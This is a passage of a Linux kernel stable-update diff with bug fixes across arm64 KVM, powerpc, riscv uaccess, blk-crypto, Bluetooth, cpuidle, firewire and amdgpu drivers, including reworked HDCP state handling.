+ 	vgic_v3_vmcr_sync(vcpu);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index c1c28fe680ba3..339a55194b2c6 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -336,14 +336,14 @@ void vgic_v4_teardown(struct kvm *kvm)
+ 	its_vm->vpes = NULL;
+ }
+ 
+-int vgic_v4_put(struct kvm_vcpu *vcpu, bool need_db)
++int vgic_v4_put(struct kvm_vcpu *vcpu)
+ {
+ 	struct its_vpe *vpe = &vcpu->arch.vgic_cpu.vgic_v3.its_vpe;
+ 
+ 	if (!vgic_supports_direct_msis(vcpu->kvm) || !vpe->resident)
+ 		return 0;
+ 
+-	return its_make_vpe_non_resident(vpe, need_db);
++	return its_make_vpe_non_resident(vpe, !!vcpu_get_flag(vcpu, IN_WFI));
+ }
+ 
+ int vgic_v4_load(struct kvm_vcpu *vcpu)
+@@ -354,6 +354,9 @@ int vgic_v4_load(struct kvm_vcpu *vcpu)
+ 	if (!vgic_supports_direct_msis(vcpu->kvm) || vpe->resident)
+ 		return 0;
+ 
++	if (vcpu_get_flag(vcpu, IN_WFI))
++		return 0;
++
+ 	/*
+ 	 * Before making the VPE resident, make sure the redistributor
+ 	 * corresponding to our current CPU expects us here. See the
+diff --git a/arch/powerpc/kernel/rtas_flash.c b/arch/powerpc/kernel/rtas_flash.c
+index bc817a5619d64..43c635ddba709 100644
+--- a/arch/powerpc/kernel/rtas_flash.c
++++ b/arch/powerpc/kernel/rtas_flash.c
+@@ -710,9 +710,9 @@ static int __init rtas_flash_init(void)
+ 	if (!rtas_validate_flash_data.buf)
+ 		return -ENOMEM;
+ 
+-	flash_block_cache = kmem_cache_create("rtas_flash_cache",
+-					      RTAS_BLK_SIZE, RTAS_BLK_SIZE, 0,
+-					      NULL);
++	flash_block_cache = kmem_cache_create_usercopy("rtas_flash_cache",
++						       RTAS_BLK_SIZE, RTAS_BLK_SIZE,
++						       0, 0, RTAS_BLK_SIZE, NULL);
+ 	if (!flash_block_cache) {
+ 		printk(KERN_ERR "%s: failed to create block cache\n",
+ 				__func__);
+diff --git a/arch/powerpc/mm/kasan/Makefile b/arch/powerpc/mm/kasan/Makefile
+index 699eeffd9f551..f9522fd70b2f3 100644
+--- a/arch/powerpc/mm/kasan/Makefile
++++ b/arch/powerpc/mm/kasan/Makefile
+@@ -1,6 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ KASAN_SANITIZE := n
++KCOV_INSTRUMENT := n
+ 
+ obj-$(CONFIG_PPC32)		+= init_32.o
+ obj-$(CONFIG_PPC_8xx)		+= 8xx.o
+diff --git a/arch/riscv/lib/uaccess.S b/arch/riscv/lib/uaccess.S
+index ec486e5369d9b..09b47ebacf2e8 100644
+--- a/arch/riscv/lib/uaccess.S
++++ b/arch/riscv/lib/uaccess.S
+@@ -17,8 +17,11 @@ ENTRY(__asm_copy_from_user)
+ 	li t6, SR_SUM
+ 	csrs CSR_STATUS, t6
+ 
+-	/* Save for return value */
+-	mv	t5, a2
++	/*
++	 * Save the terminal address which will be used to compute the number
++	 * of bytes copied in case of a fixup exception.
++	 */
++	add	t5, a0, a2
+ 
+ 	/*
+ 	 * Register allocation for code below:
+@@ -176,7 +179,7 @@ ENTRY(__asm_copy_from_user)
+ 10:
+ 	/* Disable access to user memory */
+ 	csrc CSR_STATUS, t6
+-	mv a0, t5
++	sub a0, t5, a0
+ 	ret
+ ENDPROC(__asm_copy_to_user)
+ ENDPROC(__asm_copy_from_user)
+@@ -228,7 +231,7 @@ ENTRY(__clear_user)
+ 11:
+ 	/* Disable access to user memory */
+ 	csrc CSR_STATUS, t6
+-	mv a0, a1
++	sub a0, a3, a0
+ 	ret
+ ENDPROC(__clear_user)
+ EXPORT_SYMBOL(__clear_user)
+diff --git a/block/blk-crypto-fallback.c b/block/blk-crypto-fallback.c
+index ad9844c5b40cb..e6468eab2681e 100644
+--- a/block/blk-crypto-fallback.c
++++ b/block/blk-crypto-fallback.c
+@@ -78,7 +78,7 @@ static struct blk_crypto_fallback_keyslot {
+ 	struct crypto_skcipher *tfms[BLK_ENCRYPTION_MODE_MAX];
+ } *blk_crypto_keyslots;
+ 
+-static struct blk_crypto_profile blk_crypto_fallback_profile;
++static struct blk_crypto_profile *blk_crypto_fallback_profile;
+ static struct workqueue_struct *blk_crypto_wq;
+ static mempool_t *blk_crypto_bounce_page_pool;
+ static struct bio_set crypto_bio_split;
+@@ -292,7 +292,7 @@ static bool blk_crypto_fallback_encrypt_bio(struct bio **bio_ptr)
+ 	 * Get a blk-crypto-fallback keyslot that contains a crypto_skcipher for
+ 	 * this bio's algorithm and key.
+ 	 */
+-	blk_st = blk_crypto_get_keyslot(&blk_crypto_fallback_profile,
++	blk_st = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
+ 					bc->bc_key, &slot);
+ 	if (blk_st != BLK_STS_OK) {
+ 		src_bio->bi_status = blk_st;
+@@ -395,7 +395,7 @@ static void blk_crypto_fallback_decrypt_bio(struct work_struct *work)
+ 	 * Get a blk-crypto-fallback keyslot that contains a crypto_skcipher for
+ 	 * this bio's algorithm and key.
+ 	 */
+-	blk_st = blk_crypto_get_keyslot(&blk_crypto_fallback_profile,
++	blk_st = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
+ 					bc->bc_key, &slot);
+ 	if (blk_st != BLK_STS_OK) {
+ 		bio->bi_status = blk_st;
+@@ -499,7 +499,7 @@ bool blk_crypto_fallback_bio_prep(struct bio **bio_ptr)
+ 		return false;
+ 	}
+ 
+-	if (!__blk_crypto_cfg_supported(&blk_crypto_fallback_profile,
++	if (!__blk_crypto_cfg_supported(blk_crypto_fallback_profile,
+ 					&bc->bc_key->crypto_cfg)) {
+ 		bio->bi_status = BLK_STS_NOTSUPP;
+ 		return false;
+@@ -526,7 +526,7 @@ bool blk_crypto_fallback_bio_prep(struct bio **bio_ptr)
+ 
+ int blk_crypto_fallback_evict_key(const struct blk_crypto_key *key)
+ {
+-	return __blk_crypto_evict_key(&blk_crypto_fallback_profile, key);
++	return __blk_crypto_evict_key(blk_crypto_fallback_profile, key);
+ }
+ 
+ static bool blk_crypto_fallback_inited;
+@@ -534,7 +534,6 @@ static int blk_crypto_fallback_init(void)
+ {
+ 	int i;
+ 	int err;
+-	struct blk_crypto_profile *profile = &blk_crypto_fallback_profile;
+ 
+ 	if (blk_crypto_fallback_inited)
+ 		return 0;
+@@ -545,18 +544,27 @@ static int blk_crypto_fallback_init(void)
+ 	if (err)
+ 		goto out;
+ 
+-	err = blk_crypto_profile_init(profile, blk_crypto_num_keyslots);
+-	if (err)
++	/* Dynamic allocation is needed because of lockdep_register_key(). */
++	blk_crypto_fallback_profile =
++		kzalloc(sizeof(*blk_crypto_fallback_profile), GFP_KERNEL);
++	if (!blk_crypto_fallback_profile) {
++		err = -ENOMEM;
+ 		goto fail_free_bioset;
++	}
++
++	err = blk_crypto_profile_init(blk_crypto_fallback_profile,
++				      blk_crypto_num_keyslots);
++	if (err)
++		goto fail_free_profile;
+ 	err = -ENOMEM;
+ 
+-	profile->ll_ops = blk_crypto_fallback_ll_ops;
+-	profile->max_dun_bytes_supported = BLK_CRYPTO_MAX_IV_SIZE;
++	blk_crypto_fallback_profile->ll_ops = blk_crypto_fallback_ll_ops;
++	blk_crypto_fallback_profile->max_dun_bytes_supported = BLK_CRYPTO_MAX_IV_SIZE;
+ 
+ 	/* All blk-crypto modes have a crypto API fallback. */
+ 	for (i = 0; i < BLK_ENCRYPTION_MODE_MAX; i++)
+-		profile->modes_supported[i] = 0xFFFFFFFF;
+-	profile->modes_supported[BLK_ENCRYPTION_MODE_INVALID] = 0;
++		blk_crypto_fallback_profile->modes_supported[i] = 0xFFFFFFFF;
++	blk_crypto_fallback_profile->modes_supported[BLK_ENCRYPTION_MODE_INVALID] = 0;
+ 
+ 	blk_crypto_wq = alloc_workqueue("blk_crypto_wq",
+ 					WQ_UNBOUND | WQ_HIGHPRI |
+@@ -597,7 +605,9 @@ fail_free_keyslots:
+ fail_free_wq:
+ 	destroy_workqueue(blk_crypto_wq);
+ fail_destroy_profile:
+-	blk_crypto_profile_destroy(profile);
++	blk_crypto_profile_destroy(blk_crypto_fallback_profile);
++fail_free_profile:
++	kfree(blk_crypto_fallback_profile);
+ fail_free_bioset:
+ 	bioset_exit(&crypto_bio_split);
+ out:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index faad19b396d50..d6f405763c56f 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -600,6 +600,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0d9), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0f5), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 	{ USB_DEVICE(0x13d3, 0x3568), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index cae078bffc715..9b7268bae66ab 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -2159,6 +2159,8 @@ static int sysc_reset(struct sysc *ddata)
+ 		sysc_val = sysc_read_sysconfig(ddata);
+ 		sysc_val |= sysc_mask;
+ 		sysc_write(ddata, sysc_offset, sysc_val);
++		/* Flush posted write */
++		sysc_val = sysc_read_sysconfig(ddata);
+ 	}
+ 
+ 	if (ddata->cfg.srst_udelay)
+diff --git a/drivers/cpuidle/cpuidle-psci-domain.c b/drivers/cpuidle/cpuidle-psci-domain.c
+index fe06644725203..f5d4359555d77 100644
+--- a/drivers/cpuidle/cpuidle-psci-domain.c
++++ b/drivers/cpuidle/cpuidle-psci-domain.c
+@@ -117,20 +117,6 @@ static void psci_pd_remove(void)
+ 	}
+ }
+ 
+-static bool psci_pd_try_set_osi_mode(void)
+-{
+-	int ret;
+-
+-	if (!psci_has_osi_support())
+-		return false;
+-
+-	ret = psci_set_osi_mode(true);
+-	if (ret)
+-		return false;
+-
+-	return true;
+-}
+-
+ static void psci_cpuidle_domain_sync_state(struct device *dev)
+ {
+ 	/*
+@@ -149,15 +135,12 @@ static int psci_cpuidle_domain_probe(struct platform_device *pdev)
+ {
+ 	struct device_node *np = pdev->dev.of_node;
+ 	struct device_node *node;
+-	bool use_osi;
++	bool use_osi = psci_has_osi_support();
+ 	int ret = 0, pd_count = 0;
+ 
+ 	if (!np)
+ 		return -ENODEV;
+ 
+-	/* If OSI mode is supported, let's try to enable it. */
+-	use_osi = psci_pd_try_set_osi_mode();
+-
+ 	/*
+ 	 * Parse child nodes for the "#power-domain-cells" property and
+ 	 * initialize a genpd/genpd-of-provider pair when it's found.
+@@ -167,32 +150,37 @@ static int psci_cpuidle_domain_probe(struct platform_device *pdev)
+ 			continue;
+ 
+ 		ret = psci_pd_init(node, use_osi);
+-		if (ret)
+-			goto put_node;
++		if (ret) {
++			of_node_put(node);
++			goto exit;
++		}
+ 
+ 		pd_count++;
+ 	}
+ 
+ 	/* Bail out if not using the hierarchical CPU topology. */
+ 	if (!pd_count)
+-		goto no_pd;
++		return 0;
+ 
+ 	/* Link genpd masters/subdomains to model the CPU topology. */
+ 	ret = dt_idle_pd_init_topology(np);
+ 	if (ret)
+ 		goto remove_pd;
+ 
+-	pr_info("Initialized CPU PM domain topology\n");
++	/* Let's try to enable OSI. */
++	ret = psci_set_osi_mode(use_osi);
++	if (ret)
++		goto remove_pd;
++
++	pr_info("Initialized CPU PM domain topology using %s mode\n",
++		use_osi ? "OSI" : "PC");
+ 	return 0;
+ 
+-put_node:
+-	of_node_put(node);
+ remove_pd:
++	dt_idle_pd_remove_topology(np);
+ 	psci_pd_remove();
++exit:
+ 	pr_err("failed to create CPU PM domains ret=%d\n", ret);
+-no_pd:
+-	if (use_osi)
+-		psci_set_osi_mode(false);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
+index af22be84034bb..a53eacebca339 100644
+--- a/drivers/firewire/net.c
++++ b/drivers/firewire/net.c
+@@ -479,7 +479,7 @@ static int fwnet_finish_incoming_packet(struct net_device *net,
+ 					struct sk_buff *skb, u16 source_node_id,
+ 					bool is_broadcast, u16 ether_type)
+ {
+-	int status;
++	int status, len;
+ 
+ 	switch (ether_type) {
+ 	case ETH_P_ARP:
+@@ -533,13 +533,15 @@ static int fwnet_finish_incoming_packet(struct net_device *net,
+ 		}
+ 		skb->protocol = protocol;
+ 	}
++
++	len = skb->len;
+ 	status = netif_rx(skb);
+ 	if (status == NET_RX_DROP) {
+ 		net->stats.rx_errors++;
+ 		net->stats.rx_dropped++;
+ 	} else {
+ 		net->stats.rx_packets++;
+-		net->stats.rx_bytes += skb->len;
++		net->stats.rx_bytes += len;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index fdb53d4394f30..02a112d00d413 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -185,7 +185,7 @@ static int amdgpu_cs_pass1(struct amdgpu_cs_parser *p,
+ 	uint64_t *chunk_array_user;
+ 	uint64_t *chunk_array;
+ 	uint32_t uf_offset = 0;
+-	unsigned int size;
++	size_t size;
+ 	int ret;
+ 	int i;
+ 
+@@ -1607,15 +1607,15 @@ static int amdgpu_cs_wait_all_fences(struct amdgpu_device *adev,
+ 			continue;
+ 
+ 		r = dma_fence_wait_timeout(fence, true, timeout);
++		if (r > 0 && fence->error)
++			r = fence->error;
++
+ 		dma_fence_put(fence);
+ 		if (r < 0)
+ 			return r;
+ 
+ 		if (r == 0)
+ 			break;
+-
+-		if (fence->error)
+-			return fence->error;
+ 	}
+ 
+ 	memset(wait, 0, sizeof(*wait));
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 773383e660e8c..e6427a00cf6d6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4232,6 +4232,7 @@ int amdgpu_device_suspend(struct drm_device *dev, bool fbcon)
+ 		drm_fb_helper_set_suspend_unlocked(adev_to_drm(adev)->fb_helper, true);
+ 
+ 	cancel_delayed_work_sync(&adev->delayed_init_work);
++	flush_delayed_work(&adev->gfx.gfx_off_delay_work);
+ 
+ 	amdgpu_ras_suspend(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index ed6878d5b3ce3..418e4c77ceb80 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -501,6 +501,41 @@ int amdgpu_fence_driver_sw_init(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
++/**
++ * amdgpu_fence_need_ring_interrupt_restore - helper function to check whether
++ * fence driver interrupts need to be restored.
++ *
++ * @ring: the ring to be checked
++ *
++ * Interrupts for rings that belong to GFX IP don't need to be restored
++ * when the target power state is s0ix.
++ *
++ * Return true if interrupts need to be restored, false otherwise.
++ */
++static bool amdgpu_fence_need_ring_interrupt_restore(struct amdgpu_ring *ring)
++{
++	struct amdgpu_device *adev = ring->adev;
++	bool is_gfx_power_domain = false;
++
++	switch (ring->funcs->type) {
++	case AMDGPU_RING_TYPE_SDMA:
++	/* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++		if (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0))
++			is_gfx_power_domain = true;
++		break;
++	case AMDGPU_RING_TYPE_GFX:
++	case AMDGPU_RING_TYPE_COMPUTE:
++	case AMDGPU_RING_TYPE_KIQ:
++	case AMDGPU_RING_TYPE_MES:
++		is_gfx_power_domain = true;
++		break;
++	default:
++		break;
++	}
++
++	return !(adev->in_s0ix && is_gfx_power_domain);
++}
++
+ /**
+  * amdgpu_fence_driver_hw_fini - tear down the fence driver
+  * for all possible rings.
+@@ -529,7 +564,8 @@ void amdgpu_fence_driver_hw_fini(struct amdgpu_device *adev)
+ 			amdgpu_fence_driver_force_completion(ring);
+ 
+ 		if (!drm_dev_is_unplugged(adev_to_drm(adev)) &&
+-		    ring->fence_drv.irq_src)
++		    ring->fence_drv.irq_src &&
++		    amdgpu_fence_need_ring_interrupt_restore(ring))
+ 			amdgpu_irq_put(adev, ring->fence_drv.irq_src,
+ 				       ring->fence_drv.irq_type);
+ 
+@@ -604,7 +640,8 @@ void amdgpu_fence_driver_hw_init(struct amdgpu_device *adev)
+ 			continue;
+ 
+ 		/* enable the interrupt */
+-		if (ring->fence_drv.irq_src)
++		if (ring->fence_drv.irq_src &&
++		    amdgpu_fence_need_ring_interrupt_restore(ring))
+ 			amdgpu_irq_get(adev, ring->fence_drv.irq_src,
+ 				       ring->fence_drv.irq_type);
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index b803e785d3aff..23f0067f92e4e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -585,15 +585,8 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_device *adev, bool enable)
+ 
+ 		if (adev->gfx.gfx_off_req_count == 0 &&
+ 		    !adev->gfx.gfx_off_state) {
+-			/* If going to s2idle, no need to wait */
+-			if (adev->in_s0ix) {
+-				if (!amdgpu_dpm_set_powergating_by_smu(adev,
+-						AMD_IP_BLOCK_TYPE_GFX, true))
+-					adev->gfx.gfx_off_state = true;
+-			} else {
+-				schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++			schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ 					      delay);
+-			}
+ 		}
+ 	} else {
+ 		if (adev->gfx.gfx_off_req_count == 0) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index ca5dc51600fac..9efbc0f7c6bdf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -160,7 +160,6 @@ void amdgpu_irq_disable_all(struct amdgpu_device *adev)
+ 				continue;
+ 
+ 			for (k = 0; k < src->num_types; ++k) {
+-				atomic_set(&src->enabled_types[k], 0);
+ 				r = src->funcs->set(adev, src, k,
+ 						    AMDGPU_IRQ_STATE_DISABLE);
+ 				if (r)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index eecbd8eeb1f5a..8764ff7ed97e0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -514,6 +514,8 @@ static int psp_sw_fini(void *handle)
+ 	kfree(cmd);
+ 	cmd = NULL;
+ 
++	psp_free_shared_bufs(psp);
++
+ 	if (psp->km_ring.ring_mem)
+ 		amdgpu_bo_free_kernel(&adev->firmware.rbuf,
+ 				      &psp->km_ring.ring_mem_mc_addr,
+@@ -2673,8 +2675,6 @@ static int psp_hw_fini(void *handle)
+ 
+ 	psp_ring_destroy(psp, PSP_RING_TYPE__KM);
+ 
+-	psp_free_shared_bufs(psp);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+index d3558c34d406c..296b2d5976af7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+@@ -361,6 +361,8 @@ void amdgpu_ring_fini(struct amdgpu_ring *ring)
+ 		amdgpu_bo_free_kernel(&ring->ring_obj,
+ 				      &ring->gpu_addr,
+ 				      (void **)&ring->ring);
++	} else {
++		kfree(ring->fence_drv.fences);
+ 	}
+ 
+ 	dma_fence_put(ring->vmid_wait);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index ec938a1a50621..4c661e024e13d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1352,6 +1352,7 @@ struct amdgpu_bo_va *amdgpu_vm_bo_add(struct amdgpu_device *adev,
+ 	amdgpu_vm_bo_base_init(&bo_va->base, vm, bo);
+ 
+ 	bo_va->ref_count = 1;
++	bo_va->last_pt_update = dma_fence_get_stub();
+ 	INIT_LIST_HEAD(&bo_va->valids);
+ 	INIT_LIST_HEAD(&bo_va->invalids);
+ 
+@@ -2073,7 +2074,8 @@ int amdgpu_vm_init(struct amdgpu_device *adev, struct amdgpu_vm *vm)
+ 		vm->update_funcs = &amdgpu_vm_cpu_funcs;
+ 	else
+ 		vm->update_funcs = &amdgpu_vm_sdma_funcs;
+-	vm->last_update = NULL;
++
++	vm->last_update = dma_fence_get_stub();
+ 	vm->last_unlocked = dma_fence_get_stub();
+ 	vm->last_tlb_flush = dma_fence_get_stub();
+ 
+@@ -2198,7 +2200,7 @@ int amdgpu_vm_make_compute(struct amdgpu_device *adev, struct amdgpu_vm *vm)
+ 		goto unreserve_bo;
+ 
+ 	dma_fence_put(vm->last_update);
+-	vm->last_update = NULL;
++	vm->last_update = dma_fence_get_stub();
+ 	vm->is_compute_context = true;
+ 
+ 	/* Free the shadow bo for compute VM */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9f718b98da1f7..249b269e2cc53 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -7397,27 +7397,55 @@ is_scaling_state_different(const struct dm_connector_state *dm_state,
+ }
+ 
+ #ifdef CONFIG_DRM_AMD_DC_HDCP
+-static bool is_content_protection_different(struct drm_connector_state *state,
+-					    const struct drm_connector_state *old_state,
+-					    const struct drm_connector *connector, struct hdcp_workqueue *hdcp_w)
++static bool is_content_protection_different(struct drm_crtc_state *new_crtc_state,
++					    struct drm_crtc_state *old_crtc_state,
++					    struct drm_connector_state *new_conn_state,
++					    struct drm_connector_state *old_conn_state,
++					    const struct drm_connector *connector,
++					    struct hdcp_workqueue *hdcp_w)
+ {
+ 	struct amdgpu_dm_connector *aconnector = to_amdgpu_dm_connector(connector);
+ 	struct dm_connector_state *dm_con_state = to_dm_connector_state(connector->state);
+ 
+-	/* Handle: Type0/1 change */
+-	if (old_state->hdcp_content_type != state->hdcp_content_type &&
+-	    state->content_protection != DRM_MODE_CONTENT_PROTECTION_UNDESIRED) {
+-		state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++	pr_debug("[HDCP_DM] connector->index: %x connect_status: %x dpms: %x\n",
++		connector->index, connector->status, connector->dpms);
++	pr_debug("[HDCP_DM] state protection old: %x new: %x\n",
++		old_conn_state->content_protection, new_conn_state->content_protection);
++
++	if (old_crtc_state)
++		pr_debug("[HDCP_DM] old crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++		old_crtc_state->enable,
++		old_crtc_state->active,
++		old_crtc_state->mode_changed,
++		old_crtc_state->active_changed,
++		old_crtc_state->connectors_changed);
++
++	if (new_crtc_state)
++		pr_debug("[HDCP_DM] NEW crtc en: %x a: %x m: %x a-chg: %x c-chg: %x\n",
++		new_crtc_state->enable,
++		new_crtc_state->active,
++		new_crtc_state->mode_changed,
++		new_crtc_state->active_changed,
++		new_crtc_state->connectors_changed);
++
++	/* hdcp content type change */
++	if (old_conn_state->hdcp_content_type != new_conn_state->hdcp_content_type &&
++	    new_conn_state->content_protection != DRM_MODE_CONTENT_PROTECTION_UNDESIRED) {
++		new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++		pr_debug("[HDCP_DM] Type0/1 change %s :true\n", __func__);
+ 		return true;
+ 	}
+ 
+-	/* CP is being re enabled, ignore this
+-	 *
+-	 * Handles:	ENABLED -> DESIRED
+-	 */
+-	if (old_state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED &&
+-	    state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED) {
+-		state->content_protection = DRM_MODE_CONTENT_PROTECTION_ENABLED;
++	/* CP is being re-enabled, ignore this */
++	if (old_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED &&
++	    new_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED) {
++		if (new_crtc_state && new_crtc_state->mode_changed) {
++			new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++			pr_debug("[HDCP_DM] ENABLED->DESIRED & mode_changed %s :true\n", __func__);
++			return true;
++		}
++		new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_ENABLED;
++		pr_debug("[HDCP_DM] ENABLED -> DESIRED %s :false\n", __func__);
+ 		return false;
+ 	}
+ 
+@@ -7425,9 +7453,9 @@ static bool is_content_protection_different(struct drm_connector_state *state,
+ 	 *
+ 	 * Handles:	UNDESIRED -> ENABLED
+ 	 */
+-	if (old_state->content_protection == DRM_MODE_CONTENT_PROTECTION_UNDESIRED &&
+-	    state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED)
+-		state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
++	if (old_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_UNDESIRED &&
++	    new_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED)
++		new_conn_state->content_protection = DRM_MODE_CONTENT_PROTECTION_DESIRED;
+ 
+ 	/* Stream removed and re-enabled
+ 	 *
+@@ -7437,10 +7465,12 @@ static bool is_content_protection_different(struct drm_connector_state *state,
+ 	 *
+ 	 * Handles:	DESIRED -> DESIRED (Special case)
+ 	 */
+-	if (!(old_state->crtc && old_state->crtc->enabled) &&
+-		state->crtc && state->crtc->enabled &&
++	if (!(old_conn_state->crtc && old_conn_state->crtc->enabled) &&
++		new_conn_state->crtc && new_conn_state->crtc->enabled &&
+ 		connector->state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED) {
+ 		dm_con_state->update_hdcp = false;
++		pr_debug("[HDCP_DM] DESIRED->DESIRED (Stream removed and re-enabled) %s :true\n",
++			__func__);
+ 		return true;
+ 	}
+ 
+@@ -7452,35 +7482,42 @@ static bool is_content_protection_different(struct drm_connector_state *state,
+ 	 *
+ 	 * Handles:	DESIRED -> DESIRED (Special case)
+ 	 */
+-	if (dm_con_state->update_hdcp && state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED &&
+-	    connector->dpms == DRM_MODE_DPMS_ON && aconnector->dc_sink != NULL) {
++	if (dm_con_state->update_hdcp &&
++	new_conn_state->content_protection == DRM_MODE_CONTENT_PROTECTION_DESIRED &&
++	connector->dpms == DRM_MODE_DPMS_ON && aconnector->dc_sink != NULL) {
+ 		dm_con_state->update_hdcp = false;
++		pr_debug("[HDCP_DM] DESIRED->DESIRED (Hot-plug, headless s3, dpms) %s :true\n",
++			__func__);
+ 		return true;
+ 	}
+ 
+-	/*
+-	 * Handles:	UNDESIRED -> UNDESIRED
+-	 *		DESIRED -> DESIRED
+-	 *		ENABLED -> ENABLED
+-	 */
+-	if (old_state->content_protection == state->content_protection)
++	if (old_conn_state->content_protection == new_conn_state->content_protection) {
++		if (new_conn_state->content_protection >= DRM_MODE_CONTENT_PROTECTION_DESIRED) {
++			if (new_crtc_state && new_crtc_state->mode_changed) {
++				pr_debug("[HDCP_DM] DESIRED->DESIRED or ENABLE->ENABLE mode_change %s :true\n",
++					__func__);
++				return true;
++			}
++			pr_debug("[HDCP_DM] DESIRED->DESIRED & ENABLE->ENABLE %s :false\n",
++				__func__);
++			return false;
++		}
++
++		pr_debug("[HDCP_DM] UNDESIRED->UNDESIRED %s :false\n", __func__);
+ 		return false;
++	}
+ 
+-	/*
+-	 * Handles:	UNDESIRED -> DESIRED
+-	 *		DESIRED -> UNDESIRED
+-	 *		ENABLED -> UNDESIRED
+-	 */
+-	if (state->content_protection != DRM_MODE_CONTENT_PROTECTION_ENABLED)
++	if (new_conn_state->content_protection != DRM_MODE_CONTENT_PROTECTION_ENABLED) {
++		pr_debug("[HDCP_DM] UNDESIRED->DESIRED or DESIRED->UNDESIRED or ENABLED->UNDESIRED %s :true\n",
++			__func__);
+ 		return true;
++	}
+ 
+-	/*
+-	 * Handles:	DESIRED -> ENABLED
+-	 */
++	pr_debug("[HDCP_DM] DESIRED->ENABLED %s :false\n", __func__);
+ 	return false;
+ }
+-
+ #endif
++
+ static void remove_stream(struct amdgpu_device *adev,
+ 			  struct amdgpu_crtc *acrtc,
